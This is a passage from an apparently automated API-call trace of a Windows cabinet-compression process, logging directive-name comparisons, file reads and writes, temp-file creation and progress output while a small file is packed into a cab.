_Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize1") returned -1 [0255.865] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize1") returned -9 [0255.865] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize1") returned -9 [0255.865] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize1") returned -9 [0255.865] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize1") returned -9 [0255.865] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize1") returned -7 [0255.866] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize1") returned -7 [0255.866] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize1") returned -6 [0255.866] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize1") returned -4 [0255.866] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize1") returned -1 [0255.866] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize1") returned -13 [0255.866] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize1") returned -49 [0255.866] _strcmpi (_Str1="MaxErrors", _Str2="MaxDiskSize1") returned 1 [0255.866] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="MaxDiskSize1") returned 5 [0255.866] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="MaxDiskSize1") returned 5 [0255.866] _strcmpi (_Str1="ReservePerFolderSize", _Str2="MaxDiskSize1") returned 5 [0255.866] _strcmpi (_Str1="RptFileName", _Str2="MaxDiskSize1") returned 5 [0255.867] _strcmpi (_Str1="SourceDir", _Str2="MaxDiskSize1") returned 6 [0255.867] _strcmpi (_Str1="UniqueFiles", _Str2="MaxDiskSize1") returned 8 [0255.867] _strcmpi (_Str1="DiskDirectory1", _Str2="MaxDiskSize1") returned -9 [0255.867] _strcmpi (_Str1="CabinetName1", _Str2="MaxDiskSize1") returned -10 [0255.867] atoi (_Str="1") returned 1 [0255.867] _vsnprintf (in: _DstBuf=0x27e87fb4a0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fb408 | out: _DstBuf="MaxDiskSize1") returned 12 [0255.867] atoi (_Str="1") returned 1 [0255.867] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize") returned -1 [0255.867] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize") returned -10 [0255.867] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0255.867] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize") returned -9 [0255.867] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize") returned -9 [0255.867] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize") returned -9 [0255.867] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize") returned -7 [0255.867] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize") returned -7 [0255.867] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize") returned -6 [0255.867] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize") returned -4 [0255.867] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize") returned -4 [0255.867] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize") returned -4 [0255.867] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize") returned -4 [0255.867] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize") returned -4 [0255.868] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize") returned -4 [0255.870] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize") returned -1 [0255.870] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize") returned -13 [0255.870] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize") returned 0 [0255.870] atol (_Str="0") returned 0 [0255.870] _strcmpi (_Str1="Cabinet", _Str2="ClusterSize") returned -11 [0255.870] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ClusterSize") returned -11 [0255.870] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ClusterSize") returned -11 [0255.870] _strcmpi (_Str1="ChecksumWidth", _Str2="ClusterSize") returned -4 [0255.870] _strcmpi (_Str1="ClusterSize", _Str2="ClusterSize") returned 0 [0255.870] atol (_Str="512") returned 512 [0255.870] _strcmpi (_Str1="Cabinet", _Str2="FolderFileCountThreshold") returned -3 [0255.870] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="FolderFileCountThreshold") returned -3 [0255.870] _strcmpi (_Str1="CabinetNameTemplate", _Str2="FolderFileCountThreshold") returned -3 [0255.870] _strcmpi (_Str1="ChecksumWidth", _Str2="FolderFileCountThreshold") returned -3 [0255.870] _strcmpi (_Str1="ClusterSize", _Str2="FolderFileCountThreshold") returned -3 [0255.870] _strcmpi (_Str1="Compress", _Str2="FolderFileCountThreshold") returned -3 [0255.870] _strcmpi (_Str1="LongSourceFileNames", _Str2="FolderFileCountThreshold") returned 6 [0255.871] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="FolderFileCountThreshold") returned -3 [0255.871] _strcmpi (_Str1="CompressionType", _Str2="FolderFileCountThreshold") returned -3 [0255.871] _strcmpi (_Str1="CompressionLevel", _Str2="FolderFileCountThreshold") returned -3 [0255.871] _strcmpi (_Str1="CompressionMemory", _Str2="FolderFileCountThreshold") returned -3 [0255.871] _strcmpi (_Str1="DestinationDir", _Str2="FolderFileCountThreshold") returned -2 [0255.871] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="FolderFileCountThreshold") returned -2 [0255.871] _strcmpi (_Str1="DiskLabelTemplate", _Str2="FolderFileCountThreshold") returned -2 [0255.871] _strcmpi (_Str1="DoNotCopyFiles", _Str2="FolderFileCountThreshold") returned -2 [0255.871] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="FolderFileCountThreshold") returned 0 [0255.871] atol (_Str="0") returned 0 [0255.871] FCIAddFile () returned 0x1 [0255.873] GetFileAttributesExA (in: lpFileName="01D4756785E0F97F09" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\01d4756785e0f97f09"), fInfoLevelId=0x0, lpFileInformation=0x27e87f9608 | out: lpFileInformation=0x27e87f9608*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85e0f97f, ftCreationTime.dwHighDateTime=0x1d47567, ftLastAccessTime.dwLowDateTime=0x85e0f97f, ftLastAccessTime.dwHighDateTime=0x1d47567, ftLastWriteTime.dwLowDateTime=0x85e0f97f, ftLastWriteTime.dwHighDateTime=0x1d47567, nFileSizeHigh=0x0, nFileSizeLow=0x60)) returned 1 [0255.873] FileTimeToLocalFileTime (in: lpFileTime=0x27e87f961c, lpLocalFileTime=0x27e87f9600 | out: lpLocalFileTime=0x27e87f9600) returned 1 [0255.873] FileTimeToDosDateTime (in: lpFileTime=0x27e87f9600, lpFatDate=0x27e87fb690, lpFatTime=0x27e87fb692 | out: lpFatDate=0x27e87fb690, lpFatTime=0x27e87fb692) returned 1 [0255.873] CreateFileA (lpFileName="01D4756785E0F97F09" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\01d4756785e0f97f09"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0255.874] GetLastError () returned 0x0 [0255.874] _open_osfhandle (_OSFileHandle=0xb0, _Flags=32896) returned 12 [0255.874] _read (in: _FileHandle=12, _DstBuf=0x27e8aee460, _MaxCharCount=0x8000 | out: _DstBuf=0x27e8aee460*) returned 96 [0255.874] _errno () returned 0x27e8c10840 [0255.874] _read (in: _FileHandle=12, _DstBuf=0x27e8aee4c0, _MaxCharCount=0x7fa0 | out: _DstBuf=0x27e8aee4c0) returned 0 [0255.874] _errno () returned 0x27e8c10840 [0255.874] _close (_FileHandle=12) returned 0 [0255.874] _write (in: _FileHandle=8, _Buf=0x27e87fb768*, _MaxCharCount=0x10 | out: _Buf=0x27e87fb768*) returned 16 [0255.875] _write (in: _FileHandle=8, _Buf=0x7ff6a3c058c0*, _MaxCharCount=0x13 | out: _Buf=0x7ff6a3c058c0*) returned 19 [0255.876] _close (_FileHandle=6) returned 0 [0255.876] FCIFlushCabinet () returned 0x1 [0255.877] _write (in: _FileHandle=7, _Buf=0x27e8c199f0*, _MaxCharCount=0x8 | out: _Buf=0x27e8c199f0*) returned 8 [0255.878] _write (in: _FileHandle=7, _Buf=0x27e8ae6440*, _MaxCharCount=0x4a | out: _Buf=0x27e8ae6440*) returned 74 [0255.878] atoi (_Str="1%% - %2 (%3 of %4)") returned 1 [0255.878] atoi (_Str="2 (%3 of %4)") returned 2 [0255.878] atoi (_Str="3 of %4)") returned 3 [0255.878] atoi (_Str="4)") returned 4 [0255.878] _vsnprintf (in: _DstBuf=0x27e87febf0, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87feb58 | out: _DstBuf="100.00") returned 6 [0255.878] _vsnprintf (in: _DstBuf=0x27e87febf8, _MaxCount=0x1f7, _Format="%s", _ArgList=0x27e87feb58 | out: _DstBuf="01D4756785E0F97F09") returned 18 [0255.878] _vsnprintf (in: _DstBuf=0x27e87fec0c, _MaxCount=0x1e3, _Format="%ld", _ArgList=0x27e87feb58 | out: _DstBuf="1") returned 1 [0255.878] strspn (_Str="1", _Control=" ") returned 0x0 [0255.878] strpbrk (_Str="1", _Control=" ") returned 0x0 [0255.878] _vsnprintf (in: _DstBuf=0x27e87fec0f, _MaxCount=0x1e0, _Format="%ld", _ArgList=0x27e87feb58 | out: _DstBuf="1") returned 1 [0255.878] strspn (_Str="1", _Control=" ") returned 0x0 [0255.878] strpbrk (_Str="1", _Control=" ") returned 0x0 [0255.878] atoi (_Str="1%% - %2 (%3 of %4)") returned 1 [0255.879] atoi (_Str="2 (%3 of %4)") returned 2 [0255.879] atoi (_Str="3 of %4)") returned 3 [0255.879] atoi (_Str="4)") returned 4 [0255.879] printf (_Format="%s%s\r") returned 38 [0256.114] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.114] _vsnprintf (in: _DstBuf=0x27e87fec70, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87febd8 | out: _DstBuf=" 0.00") returned 6 [0256.114] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.114] printf (_Format="%s%s\r") returned 38 [0256.253] GetCurrentProcessId () returned 0x200 [0256.253] _vsnprintf (in: _DstBuf=0x27e87fee93, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fee88 | out: _DstBuf="_512_") returned 5 [0256.253] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_10" [0256.253] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_10" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_10"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0256.253] GetLastError () returned 0x0 [0256.254] _open_osfhandle (_OSFileHandle=0x98, _Flags=34178) returned 6 [0256.254] GetCurrentProcessId () returned 0x200 [0256.254] _vsnprintf (in: _DstBuf=0x27e87fee93, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fee88 | out: _DstBuf="_512_") returned 5 [0256.254] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_11" [0256.254] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_11" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_11"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0256.255] GetLastError () returned 0x0 [0256.255] _open_osfhandle (_OSFileHandle=0xb0, _Flags=34178) returned 12 [0256.255] _lseek (_FileHandle=7, _Offset=0, _Origin=0) returned 0 [0256.255] _read (in: _FileHandle=7, _DstBuf=0x27e8c19920, _MaxCharCount=0x8 | out: _DstBuf=0x27e8c19920*) returned 8 [0256.255] _read (in: _FileHandle=7, _DstBuf=0x27e8ae6440, _MaxCharCount=0x4a | out: _DstBuf=0x27e8ae6440*) returned 74 [0256.256] _write (in: _FileHandle=9, _Buf=0x27e8c19920*, _MaxCharCount=0x8 | out: _Buf=0x27e8c19920*) returned 8 [0256.257] _write (in: _FileHandle=9, _Buf=0x27e8ae6440*, _MaxCharCount=0x4a | out: _Buf=0x27e8ae6440*) returned 74 [0256.257] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.257] _vsnprintf (in: _DstBuf=0x27e87fec70, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87febd8 | out: _DstBuf=" 45.96") returned 6 [0256.257] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.257] printf (_Format="%s%s\r") returned 34 [0256.304] _read (in: _FileHandle=7, _DstBuf=0x27e8c19920, _MaxCharCount=0x8 | out: _DstBuf=0x27e8c19920) returned 0 [0256.304] _errno () returned 0x27e8c10840 [0256.305] _write (in: _FileHandle=11, _Buf=0x27e8c19950*, _MaxCharCount=0x8 | out: _Buf=0x27e8c19950*) returned 8 [0256.306] _lseek (_FileHandle=8, _Offset=0, _Origin=0) returned 0 [0256.306] _read (in: _FileHandle=8, _DstBuf=0x27e8aa2aa4, _MaxCharCount=0x10 | out: _DstBuf=0x27e8aa2aa4*) returned 16 [0256.306] _lseek (_FileHandle=8, _Offset=0, _Origin=1) returned 16 [0256.306] _read (in: _FileHandle=8, _DstBuf=0x27e8aa2bca, _MaxCharCount=0x100 | out: _DstBuf=0x27e8aa2bca*) returned 19 [0256.306] _errno () returned 0x27e8c10840 [0256.306] _lseek (_FileHandle=8, _Offset=35, _Origin=0) returned 35 [0256.306] _vsnprintf (in: _DstBuf=0x27e87fee00, _MaxCount=0x1f, _Format="InfFileLineFormat%d", _ArgList=0x27e87fea48 | out: _DstBuf="InfFileLineFormat1") returned 18 [0256.306] _strcmpi (_Str1="Cabinet", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="ClusterSize", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="Compress", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFileLineFormat1") returned 3 [0256.306] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="CompressionType", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="CompressionLevel", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="CompressionMemory", _Str2="InfFileLineFormat1") returned -6 [0256.306] _strcmpi (_Str1="DestinationDir", _Str2="InfFileLineFormat1") returned -5 [0256.306] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFileLineFormat1") returned -5 [0256.306] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFileLineFormat1") returned -5 [0256.307] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFileLineFormat1") returned -5 [0256.307] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFileLineFormat1") returned -3 [0256.307] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFileLineFormat1") returned -3 [0256.307] _strcmpi (_Str1="GenerateInf", _Str2="InfFileLineFormat1") returned -2 [0256.307] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFileLineFormat1") returned -3 [0256.307] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFileLineFormat1") returned -3 [0256.307] _strcmpi (_Str1="InfCommentString", _Str2="InfFileLineFormat1") returned -3 [0256.307] _strcmpi (_Str1="InfDateFormat", _Str2="InfFileLineFormat1") returned -2 [0256.307] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFileLineFormat1") returned -2 [0256.307] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFileLineFormat1") returned -2 [0256.307] _strcmpi (_Str1="InfFileHeader", _Str2="InfFileLineFormat1") returned -4 [0256.307] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFileLineFormat1") returned -49 [0256.307] _strcmpi (_Str1="InfFileName", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfFooter", _Str2="InfFileLineFormat1") returned 6 [0256.307] _strcmpi (_Str1="InfFooter1", _Str2="InfFileLineFormat1") returned 6 [0256.307] _strcmpi (_Str1="InfFooter2", _Str2="InfFileLineFormat1") returned 6 [0256.307] _strcmpi (_Str1="InfFooter3", _Str2="InfFileLineFormat1") returned 6 [0256.307] _strcmpi (_Str1="InfFooter4", _Str2="InfFileLineFormat1") returned 6 [0256.307] _strcmpi (_Str1="InfHeader", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfHeader1", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfHeader2", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfHeader3", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfHeader4", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfHeader5", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfHeader6", _Str2="InfFileLineFormat1") returned 2 [0256.307] _strcmpi (_Str1="InfSectionOrder", _Str2="InfFileLineFormat1") returned 13 [0256.307] _strcmpi (_Str1="MaxCabinetSize", _Str2="InfFileLineFormat1") returned 4 [0256.307] _strcmpi (_Str1="MaxDiskFileCount", _Str2="InfFileLineFormat1") returned 4 [0256.307] _strcmpi (_Str1="MaxDiskSize", _Str2="InfFileLineFormat1") returned 4 [0256.307] _strcmpi (_Str1="MaxErrors", _Str2="InfFileLineFormat1") returned 4 [0256.307] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="InfFileLineFormat1") returned 9 [0256.308] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="InfFileLineFormat1") returned 9 [0256.308] _strcmpi (_Str1="ReservePerFolderSize", _Str2="InfFileLineFormat1") returned 9 [0256.308] _strcmpi (_Str1="RptFileName", _Str2="InfFileLineFormat1") returned 9 [0256.308] _strcmpi (_Str1="SourceDir", _Str2="InfFileLineFormat1") returned 10 [0256.308] _strcmpi (_Str1="UniqueFiles", _Str2="InfFileLineFormat1") returned 12 [0256.308] _strcmpi (_Str1="DiskDirectory1", _Str2="InfFileLineFormat1") returned -5 [0256.308] _strcmpi (_Str1="CabinetName1", _Str2="InfFileLineFormat1") returned -6 [0256.308] atoi (_Str="1") returned 1 [0256.308] _vsnprintf (in: _DstBuf=0x27e87fe8a0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe808 | out: _DstBuf="InfFileLineFormat1") returned 18 [0256.308] atoi (_Str="1") returned 1 [0256.308] _strcmpi (_Str1="Cabinet", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="ClusterSize", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="Compress", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFileLineFormat") returned 3 [0256.308] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="CompressionType", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="CompressionLevel", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="CompressionMemory", _Str2="InfFileLineFormat") returned -6 [0256.308] _strcmpi (_Str1="DestinationDir", _Str2="InfFileLineFormat") returned -5 [0256.308] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFileLineFormat") returned -5 [0256.308] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFileLineFormat") returned -5 [0256.308] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFileLineFormat") returned -5 [0256.308] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFileLineFormat") returned -3 [0256.308] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFileLineFormat") returned -3 [0256.308] _strcmpi (_Str1="GenerateInf", _Str2="InfFileLineFormat") returned -2 [0256.308] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFileLineFormat") returned -3 [0256.309] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFileLineFormat") returned -3 [0256.309] _strcmpi (_Str1="InfCommentString", _Str2="InfFileLineFormat") returned -3 [0256.309] _strcmpi (_Str1="InfDateFormat", _Str2="InfFileLineFormat") returned -2 [0256.309] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFileLineFormat") returned -2 [0256.309] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFileLineFormat") returned -2 [0256.309] _strcmpi (_Str1="InfFileHeader", _Str2="InfFileLineFormat") returned -4 [0256.309] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFileLineFormat") returned 0 [0256.309] _strcmpi (_Str1="Cabinet", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="ChecksumWidth", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="ClusterSize", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="Compress", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infdisk#") returned 3 [0256.309] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="CompressionType", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="CompressionLevel", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="CompressionMemory", _Str2="Infdisk#") returned -6 [0256.309] _strcmpi (_Str1="DestinationDir", _Str2="Infdisk#") returned -5 [0256.309] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infdisk#") returned -5 [0256.309] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infdisk#") returned -5 [0256.309] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infdisk#") returned -5 [0256.309] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Infdisk#") returned -3 [0256.309] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Infdisk#") returned -3 [0256.309] _strcmpi (_Str1="GenerateInf", _Str2="Infdisk#") returned -2 [0256.309] _strcmpi (_Str1="InfCabinetHeader", _Str2="Infdisk#") returned -1 [0256.309] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Infdisk#") returned -1 [0256.309] _strcmpi (_Str1="InfCommentString", _Str2="Infdisk#") returned -1 [0256.309] _strcmpi (_Str1="InfDateFormat", _Str2="Infdisk#") returned -8 [0256.309] _strcmpi (_Str1="InfDiskHeader", _Str2="Infdisk#") returned 69 [0256.309] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Infdisk#") returned 73 [0256.309] _strcmpi (_Str1="InfFileHeader", _Str2="Infdisk#") returned 2 [0256.309] _strcmpi (_Str1="InfFileLineFormat", _Str2="Infdisk#") returned 2 [0256.309] _strcmpi (_Str1="InfFileName", _Str2="Infdisk#") returned 2 [0256.309] _strcmpi (_Str1="InfFooter", _Str2="Infdisk#") returned 2 [0256.310] _strcmpi (_Str1="InfFooter1", _Str2="Infdisk#") returned 2 [0256.310] _strcmpi (_Str1="InfFooter2", _Str2="Infdisk#") returned 2 [0256.310] _strcmpi (_Str1="InfFooter3", _Str2="Infdisk#") returned 2 [0256.310] _strcmpi (_Str1="InfFooter4", _Str2="Infdisk#") returned 2 [0256.310] _strcmpi (_Str1="InfHeader", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="InfHeader1", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi 